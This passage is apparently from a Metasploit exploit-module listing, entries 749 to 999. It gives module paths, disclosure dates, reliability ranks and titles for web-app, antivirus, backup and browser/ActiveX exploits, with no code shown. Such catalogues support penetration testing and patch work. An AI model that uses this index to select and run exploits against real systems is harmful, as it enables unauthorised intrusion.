Upload Vulnerability + 749 unix/webapp/opensis_modname_exec 2012-12-04 excellent Yes OpenSIS 'modname' PHP Code Execution + 750 unix/webapp/openview_connectednodes_exec 2005-08-25 excellent No HP Openview connectedNodes.ovpl Remote Command Execution + 751 unix/webapp/openx_banner_edit 2009-11-24 excellent Yes OpenX banner-edit.php File Upload PHP Code Execution + 752 unix/webapp/oracle_vm_agent_utl 2010-10-12 excellent Yes Oracle VM Server Virtual Server Agent Command Injection + 753 unix/webapp/oscommerce_filemanager 2009-08-31 excellent No osCommerce 2.2 Arbitrary PHP Code Execution + 754 unix/webapp/pajax_remote_exec 2006-03-30 excellent No PAJAX Remote Command Execution + 755 unix/webapp/php_charts_exec 2013-01-16 excellent Yes PHP-Charts v1.0 PHP Code Execution Vulnerability + 756 unix/webapp/php_eval 2008-10-13 manual Yes Generic PHP Code Evaluation + 757 unix/webapp/php_include 2006-12-17 normal Yes PHP Remote File Include Generic Code Execution + 758 unix/webapp/php_vbulletin_template 2005-02-25 excellent Yes vBulletin misc.php Template Name Arbitrary Code Execution + 759 unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution + 760 unix/webapp/phpbb_highlight 2004-11-12 excellent No phpBB viewtopic.php Arbitrary Code Execution + 761 unix/webapp/phpcollab_upload_exec 2017-09-29 excellent Yes phpCollab 2.5.1 Unauthenticated File Upload + 762 unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection + 763 unix/webapp/piwik_superuser_plugin_upload 2017-02-05 excellent No Piwik Superuser Plugin Upload + 764 unix/webapp/projectpier_upload_exec 2012-10-08 excellent Yes Project Pier Arbitrary File Upload Vulnerability + 765 unix/webapp/projectsend_upload_exec 2014-12-02 excellent Yes ProjectSend Arbitrary File Upload + 766 unix/webapp/qtss_parse_xml_exec 2003-02-24 excellent No QuickTime Streaming Server parse_xml.cgi Remote Execution + 767 unix/webapp/redmine_scm_exec 2010-12-19 excellent No Redmine SCM Repository Arbitrary Command Execution + 768 unix/webapp/seportal_sqli_exec 2014-03-20 excellent Yes SePortal SQLi Remote Code Execution + 769 unix/webapp/simple_e_document_upload_exec 2014-01-23 excellent Yes Simple E-Document Arbitrary File Upload + 770 unix/webapp/sixapart_movabletype_storable_exec 2015-02-11 good Yes SixApart MovableType Storable Perl Code Execution + 771 unix/webapp/skybluecanvas_exec 2014-01-28 excellent Yes SkyBlueCanvas CMS Remote Code Execution + 772 unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution + 773 unix/webapp/spip_connect_exec 2012-07-04 excellent Yes SPIP connect Parameter PHP Injection + 774 unix/webapp/squash_yaml_exec 2013-08-06 excellent Yes Squash YAML Code Execution + 775 unix/webapp/squirrelmail_pgp_plugin 2007-07-09 manual No SquirrelMail PGP Plugin Command Execution (SMTP) + 776 unix/webapp/sugarcrm_rest_unserialize_exec 2016-06-23 excellent No SugarCRM REST Unserialize PHP Code Execution + 777 unix/webapp/sugarcrm_unserialize_exec 2012-06-23 excellent No SugarCRM unserialize() PHP Code Execution + 778 unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent Yes TikiWiki tiki-graph_formula Remote PHP Code Execution + 779 unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent Yes TikiWiki jhot Remote Command Execution + 780 unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent No Tiki Wiki unserialize() PHP Code Execution + 781 unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability + 782 unix/webapp/trixbox_langchoice 2008-07-09 manual Yes Trixbox langChoice PHP Local File Inclusion + 783 unix/webapp/tuleap_rest_unserialize_exec 2017-10-23 excellent Yes Tuleap 9.6 Second-Order PHP Object Injection + 784 unix/webapp/tuleap_unserialize_exec 2014-11-27 excellent Yes Tuleap PHP Unserialize Code Execution + 785 unix/webapp/twiki_history 2005-09-14 excellent Yes TWiki History TWikiUsers rev Parameter Command Execution + 786 unix/webapp/twiki_maketext 2012-12-15 excellent Yes TWiki MAKETEXT Remote Command Execution + 787 unix/webapp/twiki_search 2004-10-01 excellent Yes TWiki Search Function Arbitrary Command Execution + 788 unix/webapp/vbulletin_vote_sqli_exec 2013-03-25 excellent Yes vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection + 789 unix/webapp/vicidial_manager_send_cmd_exec 2013-10-23 excellent Yes VICIdial Manager Send OS Command Injection + 790 unix/webapp/vicidial_user_authorization_unauth_cmd_exec 2017-05-26 excellent Yes VICIdial user_authorization Unauthenticated Command Execution + 791 unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution + 792 unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE + 793 unix/webapp/webtester_exec 2013-10-17 excellent Yes WebTester 5.x Command Execution + 794 unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload + 795 unix/webapp/wp_advanced_custom_fields_exec 2012-11-14 excellent Yes WordPress Plugin Advanced Custom Fields Remote File Inclusion + 796 unix/webapp/wp_ajax_load_more_file_upload 2015-10-10 excellent Yes Wordpress Ajax Load More PHP Upload Vulnerability + 797 unix/webapp/wp_asset_manager_upload_exec 2012-05-26 excellent Yes WordPress Asset-Manager PHP File Upload Vulnerability + 798 unix/webapp/wp_creativecontactform_file_upload 2014-10-22 excellent Yes Wordpress Creative Contact Form Upload Vulnerability + 799 unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent Yes Wordpress Download Manager (download-manager) Unauthenticated File Upload + 800 unix/webapp/wp_easycart_unrestricted_file_upload 2015-01-08 excellent No WordPress WP EasyCart Unrestricted File Upload + 801 unix/webapp/wp_foxypress_upload 2012-06-05 excellent Yes WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution + 802 unix/webapp/wp_frontend_editor_file_upload 2012-07-04 excellent Yes Wordpress Front-end Editor File Upload + 803 unix/webapp/wp_google_document_embedder_exec 2013-01-03 normal Yes WordPress Plugin Google Document Embedder Arbitrary File Disclosure + 804 unix/webapp/wp_holding_pattern_file_upload 2015-02-11 excellent Yes WordPress Holding Pattern Theme Arbitrary File Upload + 805 unix/webapp/wp_inboundio_marketing_file_upload 2015-03-24 excellent Yes Wordpress InBoundio Marketing PHP Upload Vulnerability + 806 unix/webapp/wp_infusionsoft_upload 2014-09-25 excellent Yes Wordpress InfusionSoft Upload Vulnerability + 807 unix/webapp/wp_lastpost_exec 2005-08-09 excellent No WordPress cache_lastpostdate Arbitrary Code Execution + 808 unix/webapp/wp_mobile_detector_upload_execute 2016-05-31 excellent Yes WordPress WP Mobile Detector 3.5 Shell Upload + 809 unix/webapp/wp_nmediawebsite_file_upload 2015-04-12 excellent Yes Wordpress N-Media Website Contact Form Upload Vulnerability + 810 unix/webapp/wp_optimizepress_upload 2013-11-29 excellent Yes WordPress OptimizePress Theme File Upload Vulnerability + 811 unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent Yes WordPress Photo Gallery Unrestricted File Upload + 812 unix/webapp/wp_phpmailer_host_header 2017-05-03 average Yes WordPress PHPMailer Host Header Command Injection + 813 unix/webapp/wp_pixabay_images_upload 2015-01-19 excellent Yes WordPress Pixabay Images PHP Code Upload + 814 unix/webapp/wp_platform_exec 2015-01-21 excellent No WordPress Platform Theme File Upload Vulnerability + 815 unix/webapp/wp_property_upload_exec 2012-03-26 excellent Yes WordPress WP-Property PHP File Upload Vulnerability + 816 unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability + 817 unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent Yes WordPress RevSlider File Upload and Execute Vulnerability + 818 unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload + 819 unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload + 820 unix/webapp/wp_total_cache_exec 2013-04-17 excellent Yes WordPress W3 Total Cache PHP Code Execution + 821 unix/webapp/wp_worktheflow_upload 2015-03-14 excellent Yes Wordpress Work The Flow Upload Vulnerability + 822 unix/webapp/wp_wpshop_ecommerce_file_upload 2015-03-09 excellent Yes WordPress WPshop eCommerce Arbitrary File Upload Vulnerability + 823 unix/webapp/wp_wptouch_file_upload 2014-07-14 excellent Yes WordPress WPTouch Authenticated File Upload + 824 unix/webapp/wp_wysija_newsletters_upload 2014-07-01 excellent Yes Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload + 825 unix/webapp/xoda_file_upload 2012-08-21 excellent Yes XODA 0.4.5 Arbitrary PHP File Upload Vulnerability + 826 unix/webapp/zeroshell_exec 2013-09-22 excellent Yes ZeroShell Remote Code Execution + 827 unix/webapp/zimbra_lfi 2013-12-06 excellent Yes Zimbra Collaboration Server LFI + 828 unix/webapp/zoneminder_packagecontrol_exec 2013-01-22 excellent Yes ZoneMinder Video Server packageControl Command Execution + 829 unix/webapp/zpanel_username_exec 2013-06-07 excellent Yes ZPanel 10.0.0.2 htpasswd Module Username Command Execution + 830 unix/x11/x11_keyboard_exec 2015-07-10 excellent No X11 Keyboard Command Injection + 831 windows/antivirus/ams_hndlrsvc 2010-07-26 excellent No Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution + 832 windows/antivirus/ams_xfr 2009-04-28 excellent No Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution + 833 windows/antivirus/symantec_endpoint_manager_rce 2014-02-24 excellent Yes Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution + 834 windows/antivirus/symantec_iao 2009-04-28 good No Symantec Alert Management System Intel Alert Originator Service Buffer Overflow + 835 windows/antivirus/symantec_rtvscan 2006-05-24 good No Symantec Remote Management Buffer Overflow + 836 windows/antivirus/symantec_workspace_streaming_exec 2014-05-12 excellent Yes Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload + 837 windows/antivirus/trendmicro_serverprotect 2007-02-20 good No Trend Micro ServerProtect 5.58 Buffer Overflow + 838 windows/antivirus/trendmicro_serverprotect_createbinding 2007-05-07 good No Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow + 839 windows/antivirus/trendmicro_serverprotect_earthagent 2007-05-07 good No Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow + 840 windows/arkeia/type77 2005-02-18 good Yes Arkeia Backup Client Type 77 Overflow (Win32) + 841 windows/backdoor/energizer_duo_payload 2010-03-05 excellent No Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution + 842 windows/backupexec/name_service 2004-12-16 average No Veritas Backup Exec Name Service Overflow + 843 windows/backupexec/remote_agent 2005-06-22 great Yes Veritas Backup Exec Windows Remote Agent Overflow + 844 windows/backupexec/ssl_uaf 2017-05-10 normal Yes Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free + 845 windows/brightstor/ca_arcserve_342 2008-10-09 average No Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow + 846 windows/brightstor/discovery_tcp 2005-02-14 average Yes CA BrightStor Discovery Service TCP Overflow + 847 windows/brightstor/discovery_udp 2004-12-20 average Yes CA BrightStor Discovery Service Stack Buffer Overflow + 848 windows/brightstor/etrust_itm_alert 2008-04-04 average No Computer Associates Alert Notification Buffer Overflow + 849 windows/brightstor/hsmserver 2007-09-27 great No CA BrightStor HSM Buffer Overflow + 850 windows/brightstor/lgserver 2007-01-31 average No CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow + 851 windows/brightstor/lgserver_multi 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow + 852 windows/brightstor/lgserver_rxrlogin 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow + 853 windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow + 854 windows/brightstor/lgserver_rxsuselicenseini 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow + 855 windows/brightstor/license_gcr 2005-03-02 average No CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow + 856 windows/brightstor/mediasrv_sunrpc 2007-04-25 average No CA BrightStor ArcServe Media Service Stack Buffer Overflow + 857 windows/brightstor/message_engine 2007-01-11 average No CA BrightStor ARCserve Message Engine Buffer Overflow + 858 windows/brightstor/message_engine_72 2010-10-04 average No CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow + 859 windows/brightstor/message_engine_heap 2006-10-05 average No CA BrightStor ARCserve Message Engine Heap Overflow + 860 windows/brightstor/sql_agent 2005-08-02 average No CA BrightStor Agent for Microsoft SQL Overflow + 861 windows/brightstor/tape_engine 2006-11-21 average No CA BrightStor ARCserve Tape Engine Buffer Overflow + 862 windows/brightstor/tape_engine_0x8a 2010-10-04 average No CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow + 863 windows/brightstor/universal_agent 2005-04-11 average No CA BrightStor Universal Agent Overflow + 864 windows/browser/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow + 865 windows/browser/adobe_flash_avm2 2014-02-05 normal No Adobe Flash Player Integer Underflow Remote Code Execution + 866 windows/browser/adobe_flash_casi32_int_overflow 2014-10-14 great No Adobe Flash Player casi32 Integer Overflow + 867 windows/browser/adobe_flash_copy_pixels_to_byte_array 2014-09-23 great No Adobe Flash Player copyPixelsToByteArray Method Integer Overflow + 868 windows/browser/adobe_flash_domain_memory_uaf 2014-04-14 great No Adobe Flash Player domainMemory ByteArray Use After Free + 869 windows/browser/adobe_flash_filters_type_confusion 2013-12-10 normal No Adobe Flash Player Type Confusion Remote Code Execution + 870 windows/browser/adobe_flash_mp4_cprt 2012-02-15 normal No Adobe Flash Player MP4 'cprt' Overflow + 871 windows/browser/adobe_flash_otf_font 2012-08-09 normal No Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow + 872 windows/browser/adobe_flash_pcre 2014-11-25 normal No Adobe Flash Player PCRE Regex Vulnerability + 873 windows/browser/adobe_flash_regex_value 2013-02-08 normal No Adobe Flash Player Regular Expression Heap Overflow + 874 windows/browser/adobe_flash_rtmp 2012-05-04 normal No Adobe Flash Player Object Type Confusion + 875 windows/browser/adobe_flash_sps 2011-08-09 normal No Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow + 876 windows/browser/adobe_flash_uncompress_zlib_uninitialized 2014-11-11 good No Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory + 877 windows/browser/adobe_flash_worker_byte_array_uaf 2015-02-02 great No Adobe Flash Player ByteArray With Workers Use After Free + 878 windows/browser/adobe_flashplayer_arrayindexing 2012-06-21 great No Adobe Flash Player AVM Verification Logic Array Indexing Code Execution + 879 windows/browser/adobe_flashplayer_avm 2011-03-15 good No Adobe Flash Player AVM Bytecode Verification Vulnerability + 880 windows/browser/adobe_flashplayer_flash10o 2011-04-11 normal No Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability + 881 windows/browser/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use + 882 windows/browser/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow + 883 windows/browser/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow + 884 windows/browser/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Heap Corruption + 885 windows/browser/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability + 886 windows/browser/adobe_shockwave_rcsl_corruption 2010-10-21 normal No Adobe Shockwave rcsL Memory Corruption + 887 windows/browser/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free + 888 windows/browser/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow + 889 windows/browser/advantech_webaccess_dvs_getcolor 2014-07-17 normal No Advantech WebAccess dvs.ocx GetColor Buffer Overflow + 890 windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow + 891 windows/browser/aladdin_choosefilepath_bof 2012-04-01 normal No Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow + 892 windows/browser/amaya_bdo 2009-01-28 normal No Amaya Browser v11.0 'bdo' Tag Overflow + 893 windows/browser/aol_ampx_convertfile 2009-05-19 normal No AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow + 894 windows/browser/aol_icq_downloadagent 2006-11-06 excellent No America Online ICQ ActiveX Control Arbitrary File Download and Execute + 895 windows/browser/apple_itunes_playlist 2005-01-11 normal No Apple ITunes 4.7 Playlist Buffer Overflow + 896 windows/browser/apple_quicktime_marshaled_punk 2010-08-30 great No Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution + 897 windows/browser/apple_quicktime_mime_type 2012-11-07 normal No Apple QuickTime 7.7.2 MIME Type Buffer Overflow + 898 windows/browser/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow + 899 windows/browser/apple_quicktime_rtsp 2007-01-01 normal No Apple QuickTime 7.1.3 RTSP URI Buffer Overflow + 900 windows/browser/apple_quicktime_smil_debug 2010-08-12 good No Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow + 901 windows/browser/apple_quicktime_texml_font_table 2012-11-07 normal No Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow + 902 windows/browser/ask_shortformat 2007-09-24 normal No Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow + 903 windows/browser/asus_net4switch_ipswcom 2012-02-17 normal No ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow + 904 windows/browser/athocgov_completeinstallation 2008-02-15 normal No AtHocGov IWSAlerts ActiveX Control Buffer Overflow + 905 windows/browser/autodesk_idrop 2009-04-02 normal No Autodesk IDrop ActiveX Control Heap Memory Corruption + 906 windows/browser/aventail_epi_activex 2010-08-19 normal No SonicWALL Aventail epi.dll AuthCredential Format String + 907 windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow + 908 windows/browser/awingsoft_winds3d_sceneurl 2009-11-14 excellent No AwingSoft Winds3D Player 3.5 SceneURL Download and Execute + 909 windows/browser/baofeng_storm_onbeforevideodownload 2009-04-30 normal No BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow + 910 windows/browser/barcode_ax49 2007-06-22 normal No RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow + 911 windows/browser/blackice_downloadimagefileurl 2008-06-05 excellent No Black Ice Cover Page ActiveX Control Arbitrary File Download + 912 windows/browser/c6_messenger_downloaderactivex 2008-06-03 excellent No Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute + 913 windows/browser/ca_brightstor_addcolumn 2008-03-16 normal No CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow + 914 windows/browser/chilkat_crypt_writefile 2008-11-03 excellent No Chilkat Crypt ActiveX WriteFile Unsafe Method + 915 windows/browser/chrome_filereader_uaf 2019-03-21 manual No Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86 + 916 windows/browser/cisco_anyconnect_exec 2011-06-01 excellent No Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute + 917 windows/browser/cisco_playerpt_setsource 2012-03-22 normal No Cisco Linksys PlayerPT ActiveX Control Buffer Overflow + 918 windows/browser/cisco_playerpt_setsource_surl 2012-07-17 normal No Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow + 919 windows/browser/cisco_webex_ext 2017-01-21 great No Cisco WebEx Chrome Extension RCE (CVE-2017-3823) + 920 windows/browser/citrix_gateway_actx 2011-07-14 normal No Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability + 921 windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution + 922 windows/browser/communicrypt_mail_activex 2010-05-19 great No CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow + 923 windows/browser/creative_software_cachefolder 2008-05-28 normal No Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow + 924 windows/browser/crystal_reports_printcontrol 2010-12-14 normal No Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow + 925 windows/browser/dell_webcam_crazytalk 2012-03-19 normal No Dell Webcam CrazyTalk ActiveX BackImage Vulnerability + 926 windows/browser/dxstudio_player_exec 2009-06-09 excellent No Worldweaver DX Studio Player shell.execute() Command Execution + 927 windows/browser/ea_checkrequirements 2007-10-08 normal No Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow + 928 windows/browser/ebook_flipviewer_fviewerloading 2007-06-06 normal No FlipViewer FViewerLoading ActiveX Control Buffer Overflow + 929 windows/browser/enjoysapgui_comp_download 2009-04-15 excellent No EnjoySAP SAP GUI ActiveX Control Arbitrary File Download + 930 windows/browser/enjoysapgui_preparetoposthtml 2007-07-05 normal No EnjoySAP SAP GUI ActiveX Control Buffer Overflow + 931 windows/browser/exodus 2018-01-25 manual No Exodus Wallet (ElectronJS Framework) remote Code Execution + 932 windows/browser/facebook_extractiptc 2008-01-31 normal No Facebook Photo Uploader 4 ActiveX Control Buffer Overflow + 933 windows/browser/firefox_smil_uaf 2016-11-30 normal No Firefox nsSMILTimeContainer::NotifyTimeChange() RCE + 934 windows/browser/foxit_reader_plugin_url_bof 2013-01-07 normal No Foxit Reader Plugin URL Processing Buffer Overflow + 935 windows/browser/getgodm_http_response_bof 2014-03-09 normal No GetGo Download Manager HTTP Response Buffer Overflow + 936 windows/browser/gom_openurl 2007-10-27 normal No GOM Player ActiveX Control Buffer Overflow + 937 windows/browser/greendam_url 2009-06-11 normal No Green Dam URL Processing Buffer Overflow + 938 windows/browser/honeywell_hscremotedeploy_exec 2013-02-22 excellent No Honeywell HSC Remote Deployer ActiveX Remote Code Execution + 939 windows/browser/honeywell_tema_exec 2011-10-20 excellent No Honeywell Tema Remote Installer ActiveX Remote Code Execution + 940 windows/browser/hp_alm_xgo_setshapenodetype_exec 2012-08-29 normal No HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution + 941 windows/browser/hp_easy_printer_care_xmlcachemgr 2012-01-11 great No HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution + 942 windows/browser/hp_easy_printer_care_xmlsimpleaccessor 2011-08-16 great No HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution + 943 windows/browser/hp_loadrunner_addfile 2008-01-25 normal No Persits XUpload ActiveX AddFile Buffer Overflow + 944 windows/browser/hp_loadrunner_addfolder 2007-12-25 good No HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow + 945 windows/browser/hp_loadrunner_writefilebinary 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX Remote Code Execution + 946 windows/browser/hp_loadrunner_writefilestring 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution + 947 windows/browser/hpmqc_progcolor 2007-04-04 normal No HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow + 948 windows/browser/hyleos_chemviewx_activex 2010-02-10 good No Hyleos ChemView ActiveX Control Stack Buffer Overflow + 949 windows/browser/ibm_spss_c1sizer 2013-04-26 normal No IBM SPSS SamplePower C1Tab ActiveX Heap Overflow + 950 windows/browser/ibm_tivoli_pme_activex_bof 2012-03-01 normal No IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow + 951 windows/browser/ibmegath_getxmlvalue 2009-03-24 normal No IBM Access Support ActiveX Control Buffer Overflow + 952 windows/browser/ibmlotusdomino_dwa_uploadmodule 2007-12-20 normal No IBM Lotus Domino Web Access Upload Module Buffer Overflow + 953 windows/browser/ie_cbutton_uaf 2012-12-27 normal No MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability + 954 windows/browser/ie_cgenericelement_uaf 2013-05-03 good No MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability + 955 windows/browser/ie_createobject 2006-04-11 excellent No MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution + 956 windows/browser/ie_execcommand_uaf 2012-09-14 good No MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability + 957 windows/browser/ie_iscomponentinstalled 2006-02-24 normal No Microsoft Internet Explorer isComponentInstalled Overflow + 958 windows/browser/ie_setmousecapture_uaf 2013-09-17 normal No MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free + 959 windows/browser/ie_unsafe_scripting 2010-09-20 manual No Microsoft Internet Explorer Unsafe Scripting Misconfiguration + 960 windows/browser/imgeviewer_tifmergemultifiles 2010-03-03 normal No Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control + 961 windows/browser/indusoft_issymbol_internationalseparator 2012-04-28 normal No InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow + 962 windows/browser/inotes_dwa85w_bof 2012-06-01 normal No IBM Lotus iNotes dwa85W ActiveX Buffer Overflow + 963 windows/browser/intrust_annotatex_add 2012-03-28 average No Quest InTrust Annotation Objects Uninitialized Pointer + 964 windows/browser/java_basicservice_impl 2010-10-12 excellent No Sun Java Web Start BasicServiceImpl Code Execution + 965 windows/browser/java_cmm 2013-03-01 normal No Java CMM Remote Code Execution + 966 windows/browser/java_codebase_trust 2011-02-15 excellent No Sun Java Applet2ClassLoader Remote Code Execution + 967 windows/browser/java_docbase_bof 2010-10-12 great No Sun Java Runtime New Plugin docbase Buffer Overflow + 968 windows/browser/java_mixer_sequencer 2010-03-30 great No Java MixerSequencer Object GM_Song Structure Handling Vulnerability + 969 windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start Plugin Command Line Argument Injection + 970 windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection + 971 windows/browser/java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start Plugin Command Line Argument Injection + 972 windows/browser/juniper_sslvpn_ive_setupdll 2006-04-26 normal No Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow + 973 windows/browser/kazaa_altnet_heap 2007-10-03 normal No Kazaa Altnet Download Manager ActiveX Control Buffer Overflow + 974 windows/browser/keyhelp_launchtripane_exec 2012-06-26 excellent No KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability + 975 windows/browser/logitechvideocall_start 2007-05-31 normal No Logitech VideoCall ActiveX Control Buffer Overflow + 976 windows/browser/lpviewer_url 2008-10-06 normal No iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow + 977 windows/browser/macrovision_downloadandexecute 2007-10-31 normal No Macrovision InstallShield Update Service Buffer Overflow + 978 windows/browser/macrovision_unsafe 2007-10-20 excellent No Macrovision InstallShield Update Service ActiveX Unsafe Method + 979 windows/browser/malwarebytes_update_exec 2014-12-16 good No Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution + 980 windows/browser/maxthon_history_xcs 2012-11-26 excellent No Maxthon3 about:history XCS Trusted Zone Code Execution + 981 windows/browser/mcafee_mcsubmgr_vsprintf 2006-08-01 normal No McAfee Subscription Manager Stack Buffer Overflow + 982 windows/browser/mcafee_mvt_exec 2012-04-30 excellent No McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability + 983 windows/browser/mcafeevisualtrace_tracetarget 2007-07-07 normal No McAfee Visual Trace ActiveX Control Buffer Overflow + 984 windows/browser/mirc_irc_url 2003-10-13 normal No mIRC IRC URL Buffer Overflow + 985 windows/browser/mozilla_attribchildremoved 2011-12-06 average No Firefox 8/9 AttributeChildRemoved() Use-After-Free + 986 windows/browser/mozilla_firefox_onreadystatechange 2013-06-25 normal No Firefox onreadystatechange Event DocumentViewerImpl Use After Free + 987 windows/browser/mozilla_firefox_xmlserializer 2013-01-08 normal No Firefox XMLSerializer Use After Free + 988 windows/browser/mozilla_interleaved_write 2010-10-25 normal No Mozilla Firefox Interleaved document.write/appendChild Memory Corruption + 989 windows/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability + 990 windows/browser/mozilla_nssvgvalue 2011-12-06 average No Firefox nsSVGValue Out-of-Bounds Access Vulnerability + 991 windows/browser/mozilla_nstreerange 2011-02-02 normal No Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability + 992 windows/browser/mozilla_reduceright 2011-06-21 normal No Mozilla Firefox Array.reduceRight() Integer Overflow + 993 windows/browser/ms03_020_ie_objecttype 2003-06-04 normal No MS03-020 Microsoft Internet Explorer Object Type + 994 windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution + 995 windows/browser/ms06_001_wmf_setabortproc 2005-12-27 great No Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution + 996 windows/browser/ms06_013_createtextrange 2006-03-19 normal No MS06-013 Microsoft Internet Explorer createTextRange() Code Execution + 997 windows/browser/ms06_055_vml_method 2006-09-19 normal No MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution + 998 windows/browser/ms06_057_webview_setslice 2006-07-17 normal No MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow + 999 windows/browser/ms06_067_keyframe 2006-11-14 normal No MS06-067 